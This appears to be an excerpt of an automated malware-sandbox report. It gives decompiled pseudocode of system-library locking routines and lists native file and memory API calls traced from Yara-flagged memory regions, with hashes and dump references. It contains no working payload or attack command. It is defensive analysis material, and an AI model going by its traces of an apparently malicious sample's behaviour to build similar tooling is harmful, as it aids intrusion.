                _t58 = _t58 + 0x10;
                _t54 = _t54 + _t40 * 2;
            }
            _t53 = (_t54 -  &_v140 >> 1) + 1;
            *_t52 = _t53;
            if( *_t52 < _t53) {
                goto L10;
            } else {
                E00922340(_t45,  &_v140, _t53 + _t53);
                _t26 = 0;
            }
        }
    }
    return E0092E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
}





















APIs
• ___swprintf_l.LIBCMT ref: 0098EA22
  • Part of subcall function 009613CB: ___swprintf_l.LIBCMT ref: 0096146B
  • Part of subcall function 009613CB: ___swprintf_l.LIBCMT ref: 00961490
• ___swprintf_l.LIBCMT ref: 0096156D
Strings
Memory Dump Source
• Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: 1c844c141e130c84103369c93898b7f855893a66e8cc0142b8507b627a662c3f
• Instruction ID: 36043da76b819bdf085d6c046f88818ee0ace6942009f231e6a4d3b21182b3c8
• Opcode Fuzzy Hash: 1c844c141e130c84103369c93898b7f855893a66e8cc0142b8507b627a662c3f
• Instruction Fuzzy Hash: 9A21A5729002299FCF21EE54DC45AEEB3ACAB94700F484555FC47D3241DB74EE588BE1
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 45%
                                                                                                                                                    			E009453A5(signed int _a4, char _a8) {
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				signed int _t32;
                                                                                                                                                    				signed int _t37;
                                                                                                                                                    				signed int _t40;
                                                                                                                                                    				signed int _t42;
                                                                                                                                                    				void* _t45;
                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                    				void* _t48;
                                                                                                                                                    				signed int _t49;
                                                                                                                                                    				void* _t51;
                                                                                                                                                    				signed int _t57;
                                                                                                                                                    				signed int _t64;
                                                                                                                                                    				signed int _t71;
                                                                                                                                                    				void* _t74;
                                                                                                                                                    				intOrPtr _t78;
                                                                                                                                                    				signed int* _t79;
                                                                                                                                                    				void* _t85;
                                                                                                                                                    				signed int _t86;
                                                                                                                                                    				signed int _t92;
                                                                                                                                                    				void* _t104;
                                                                                                                                                    				void* _t105;
                                                                                                                                                    
                                                                                                                                                    				_t64 = _a4;
                                                                                                                                                    				_t32 =  *(_t64 + 0x28);
                                                                                                                                                    				_t71 = _t64 + 0x28;
                                                                                                                                                    				_push(_t92);
                                                                                                                                                    				if(_t32 < 0) {
                                                                                                                                                    					_t78 =  *[fs:0x18];
                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                    					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                    						goto L3;
                                                                                                                                                    					} else {
                                                                                                                                                    						__eflags = _t32 | 0xffffffff;
                                                                                                                                                    						asm("lock xadd [ecx], eax");
                                                                                                                                                    						return 1;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					L3:
                                                                                                                                                    					_push(_t86);
                                                                                                                                                    					while(1) {
                                                                                                                                                    						L4:
                                                                                                                                                    						__eflags = _t32;
                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						__eflags = _a8;
                                                                                                                                                    						if(_a8 == 0) {
                                                                                                                                                    							__eflags = 0;
                                                                                                                                                    							return 0;
                                                                                                                                                    						} else {
                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                    							_t79 = _t64 + 0x24;
                                                                                                                                                    							_t71 = 1;
                                                                                                                                                    							asm("lock xadd [eax], ecx");
                                                                                                                                                    							_t32 =  *(_t64 + 0x28);
                                                                                                                                                    							_a4 = _t32;
                                                                                                                                                    							__eflags = _t32;
                                                                                                                                                    							if(_t32 != 0) {
                                                                                                                                                    								L19:
                                                                                                                                                    								_t86 = 0;
                                                                                                                                                    								__eflags = 0;
                                                                                                                                                    								while(1) {
                                                                                                                                                    									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                    									asm("sbb esi, esi");
                                                                                                                                                    									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00a001c0;
                                                                                                                                                    									_push(_t92);
                                                                                                                                                    									_push(0);
                                                                                                                                                    									_t37 = E0091F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                    									__eflags = _t37 - 0x102;
                                                                                                                                                    									if(_t37 != 0x102) {
                                                                                                                                                    										break;
                                                                                                                                                    									}
                                                                                                                                                    									_t71 =  *(_t92 + 4);
                                                                                                                                                    									_t85 =  *_t92;
                                                                                                                                                    									_t51 = L00964FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                    									_push(_t85);
                                                                                                                                                    									_push(_t51);
                                                                                                                                                    									L00973F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                    									L00973F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                    									_t86 = _t86 + 1;
                                                                                                                                                    									_t105 = _t104 + 0x28;
                                                                                                                                                    									__eflags = _t86 - 2;
                                                                                                                                                    									if(__eflags > 0) {
                                                                                                                                                    										E009A217A(_t71, __eflags, _t64);
                                                                                                                                                    									}
                                                                                                                                                    									_push("RTL: Re-Waiting\n");
                                                                                                                                                    									_push(0);
                                                                                                                                                    									_push(0x65);
                                                                                                                                                    									L00973F92();
                                                                                                                                                    									_t104 = _t105 + 0xc;
                                                                                                                                                    								}
                                                                                                                                                    								__eflags = _t37;
                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                    									_push(_t37);
                                                                                                                                                    									L00963915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                    									asm("int3");
                                                                                                                                                    									_t40 =  *_t71;
                                                                                                                                                    									 *_t71 = 0;
                                                                                                                                                    									__eflags = _t40;
                                                                                                                                                    									if(_t40 == 0) {
                                                                                                                                                    										L1:
                                                                                                                                                    										_t42 = E00945384(_t92 + 0x24);
                                                                                                                                                    										if(_t42 != 0) {
                                                                                                                                                    											goto L31;
                                                                                                                                                    										} else {
                                                                                                                                                    											goto L2;
                                                                                                                                                    										}
                                                                                                                                                    									} else {
                                                                                                                                                    										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                    										_push( &_a4);
                                                                                                                                                    										_push(_t40);
                                                                                                                                                    										_t49 = L0091F970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                    										__eflags = _t49;
                                                                                                                                                    										if(__eflags >= 0) {
                                                                                                                                                    											goto L1;
                                                                                                                                                    										} else {
                                                                                                                                                    											_push(_t49);
                                                                                                                                                    											L00963915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                    											L31:
                                                                                                                                                    											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                    											_push( &_a4);
                                                                                                                                                    											_push(1);
                                                                                                                                                    											_t42 = L0091F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                    											__eflags = _t42;
                                                                                                                                                    											if(__eflags >= 0) {
                                                                                                                                                    												L2:
                                                                                                                                                    												return _t42;
                                                                                                                                                    											} else {
                                                                                                                                                    												_push(_t42);
                                                                                                                                                    												L00963915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                    												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                    												_push( &_a4);
                                                                                                                                                    												_push(1);
                                                                                                                                                    												_t42 = L0091F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                    												__eflags = _t42;
                                                                                                                                                    												if(__eflags >= 0) {
                                                                                                                                                    													goto L2;
                                                                                                                                                    												} else {
                                                                                                                                                    													_push(_t42);
                                                                                                                                                    													_t45 = L00963915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                    													asm("int3");
                                                                                                                                                    													while(1) {
                                                                                                                                                    														_t74 = _t45;
                                                                                                                                                    														__eflags = _t45 - 1;
                                                                                                                                                    														if(_t45 != 1) {
                                                                                                                                                    															break;
                                                                                                                                                    														}
                                                                                                                                                    														_t86 = _t86 | 0xffffffff;
                                                                                                                                                    														_t45 = _t74;
                                                                                                                                                    														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                    														__eflags = _t45 - _t74;
                                                                                                                                                    														if(_t45 != _t74) {
                                                                                                                                                    															continue;
                                                                                                                                                    														} else {
                                                                                                                                                    															_t46 =  *[fs:0x18];
                                                                                                                                                    															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                    															return _t46;
                                                                                                                                                    														}
                                                                                                                                                    														goto L38;
                                                                                                                                                    													}
                                                                                                                                                    													E00945329(_t74, _t92);
                                                                                                                                                    													_push(1);
                                                                                                                                                    													_t48 = E009453A5(_t92);
                                                                                                                                                    													return _t48;
                                                                                                                                                    												}
                                                                                                                                                    											}
                                                                                                                                                    										}
                                                                                                                                                    									}
                                                                                                                                                    								} else {
                                                                                                                                                    									_t32 =  *(_t64 + 0x28);
                                                                                                                                                    									continue;
                                                                                                                                                    								}
                                                                                                                                                    							} else {
                                                                                                                                                    								_t71 =  *_t79;
                                                                                                                                                    								__eflags = _t71;
                                                                                                                                                    								if(__eflags > 0) {
                                                                                                                                                    									while(1) {
                                                                                                                                                    										_t57 = _t71;
                                                                                                                                                    										asm("lock cmpxchg [edi], esi");
                                                                                                                                                    										__eflags = _t57 - _t71;
                                                                                                                                                    										if(_t57 == _t71) {
                                                                                                                                                    											break;
                                                                                                                                                    										}
                                                                                                                                                    										_t71 = _t57;
                                                                                                                                                    										__eflags = _t57;
                                                                                                                                                    										if(_t57 > 0) {
                                                                                                                                                    											continue;
                                                                                                                                                    										}
                                                                                                                                                    										break;
                                                                                                                                                    									}
                                                                                                                                                    									_t32 = _a4;
                                                                                                                                                    									__eflags = _t71;
                                                                                                                                                    								}
                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                    									continue;
                                                                                                                                                    								} else {
                                                                                                                                                    									goto L19;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						goto L38;
                                                                                                                                                    					}
                                                                                                                                                    					_t71 = _t71 | 0xffffffff;
                                                                                                                                                    					_t32 = 0;
                                                                                                                                                    					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                    					__eflags = 0;
                                                                                                                                                    					if(0 != 0) {
                                                                                                                                                    						goto L4;
                                                                                                                                                    					} else {
                                                                                                                                                    						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                    						return 1;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				L38:
                                                                                                                                                    			}


























                                                                                                                                                    0x00982386
                                                                                                                                                    0x00982389
                                                                                                                                                    0x0098238e
                                                                                                                                                    0x00982390
                                                                                                                                                    0x00945378
                                                                                                                                                    0x0094537c
                                                                                                                                                    0x00982396
                                                                                                                                                    0x00982396
                                                                                                                                                    0x00982397
                                                                                                                                                    0x0098239c
                                                                                                                                                    0x009823a2
                                                                                                                                                    0x009823a3
                                                                                                                                                    0x009823a6
                                                                                                                                                    0x009823ab
                                                                                                                                                    0x009823ad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009823b3
                                                                                                                                                    0x009823b3
                                                                                                                                                    0x009823b4
                                                                                                                                                    0x009823b9
                                                                                                                                                    0x009823ba
                                                                                                                                                    0x009823ba
                                                                                                                                                    0x009823bc
                                                                                                                                                    0x009823bf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00979153
                                                                                                                                                    0x00979158
                                                                                                                                                    0x0097915a
                                                                                                                                                    0x0097915e
                                                                                                                                                    0x00979160
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00979166
                                                                                                                                                    0x00979166
                                                                                                                                                    0x00979171
                                                                                                                                                    0x00979176
                                                                                                                                                    0x00979176
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00979160
                                                                                                                                                    0x009823c6
                                                                                                                                                    0x009823cb
                                                                                                                                                    0x009823ce
                                                                                                                                                    0x009823d7
                                                                                                                                                    0x009823d7
                                                                                                                                                    0x009823ad
                                                                                                                                                    0x00982390
                                                                                                                                                    0x00982373
                                                                                                                                                    0x0098233f
                                                                                                                                                    0x0098233f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098233f
                                                                                                                                                    0x00982291
                                                                                                                                                    0x00982291
                                                                                                                                                    0x00982293
                                                                                                                                                    0x00982295
                                                                                                                                                    0x0098229a
                                                                                                                                                    0x009822a1
                                                                                                                                                    0x009822a3
                                                                                                                                                    0x009822a7
                                                                                                                                                    0x009822a9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009822ab
                                                                                                                                                    0x009822ad
                                                                                                                                                    0x009822af
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009822af
                                                                                                                                                    0x009822b1
                                                                                                                                                    0x009822b4
                                                                                                                                                    0x009822b4
                                                                                                                                                    0x009822b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009822b6
                                                                                                                                                    0x0098228f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098226d
                                                                                                                                                    0x009453cb
                                                                                                                                                    0x009453ce
                                                                                                                                                    0x009453d0
                                                                                                                                                    0x009453d4
                                                                                                                                                    0x009453d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009453d8
                                                                                                                                                    0x009453e3
                                                                                                                                                    0x009453ea
                                                                                                                                                    0x009453ea
                                                                                                                                                    0x009453d6
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009822F4
                                                                                                                                                    Strings
                                                                                                                                                    • RTL: Resource at %p, xrefs: 0098230B
                                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009822FC
                                                                                                                                                    • RTL: Re-Waiting, xrefs: 00982328
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                    • API String ID: 885266447-871070163
                                                                                                                                                    • Opcode ID: 7b86c822cbb0e69a2f6818cd3f510ab08ce56b5a5b1a6d32f3d8711a827686f4
                                                                                                                                                    • Instruction ID: cb1b6fc7e38465670291edf029cc9b26bb7b5b1358641e454a77219d92c1c855
                                                                                                                                                    • Opcode Fuzzy Hash: 7b86c822cbb0e69a2f6818cd3f510ab08ce56b5a5b1a6d32f3d8711a827686f4
                                                                                                                                                    • Instruction Fuzzy Hash: AF512671700705ABDB14EF68DC81FA6739CEF98760F114229FD18DB282EA65ED418BA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Executed Functions

                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000D82C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: 9$!:
                                                                                                                                                    • API String ID: 2738559852-2940118174
                                                                                                                                                    • Opcode ID: abf5278e8540d4ea5905ef30342c47f9ba828cac3fbda6a447cdebdc4f11bcbc
                                                                                                                                                    • Instruction ID: ad52d4d1fa4c58c12c8fc1c84e9bc77070acd5d020a6dab97f03ac6f9dfebb6f
                                                                                                                                                    • Opcode Fuzzy Hash: abf5278e8540d4ea5905ef30342c47f9ba828cac3fbda6a447cdebdc4f11bcbc
                                                                                                                                                    • Instruction Fuzzy Hash: 1311C0B6200108AFCB14DFA9D880DEB77AAAF8C354F158249FA1DA3241C630E8518BA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,000D3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000D821D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID: .z`
                                                                                                                                                    • API String ID: 823142352-1441809116
                                                                                                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                    • Instruction ID: a4e13bb10a32d1aefb8ea9b526925838d165b3bee3edd4daf31b229b7121f919
                                                                                                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                    • Instruction Fuzzy Hash: B1F0B2B2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,000D3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000D821D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID: .z`
                                                                                                                                                    • API String ID: 823142352-1441809116
                                                                                                                                                    • Opcode ID: 920ab7eabea7f7a9b589d830073e3aaaf4ec3dbf92e9582d46a3daece6709f26
                                                                                                                                                    • Instruction ID: 0fdf115eba095590fc39d15cc0d0d1866277a7003a026283d8e3947a373a5f47
                                                                                                                                                    • Opcode Fuzzy Hash: 920ab7eabea7f7a9b589d830073e3aaaf4ec3dbf92e9582d46a3daece6709f26
                                                                                                                                                    • Instruction Fuzzy Hash: CDF0ECB6214148ABCB08CF99D884CEB77A9FF8C354B15964DF95D93202D630E855CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000D82C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: !:
                                                                                                                                                    • API String ID: 2738559852-2648069889
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000D82C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: !:
                                                                                                                                                    • API String ID: 2738559852-2648069889
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtClose.NTDLL(@=,?,?,000D3D40,00000000,FFFFFFFF), ref: 000D8325
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close
                                                                                                                                                    • String ID: @=
                                                                                                                                                    • API String ID: 3535843008-2609012945
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000C2D11,00002000,00003000,00000004), ref: 000D83E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000C2D11,00002000,00003000,00000004), ref: 000D83E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000C2D11,00002000,00003000,00000004), ref: 000D83E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
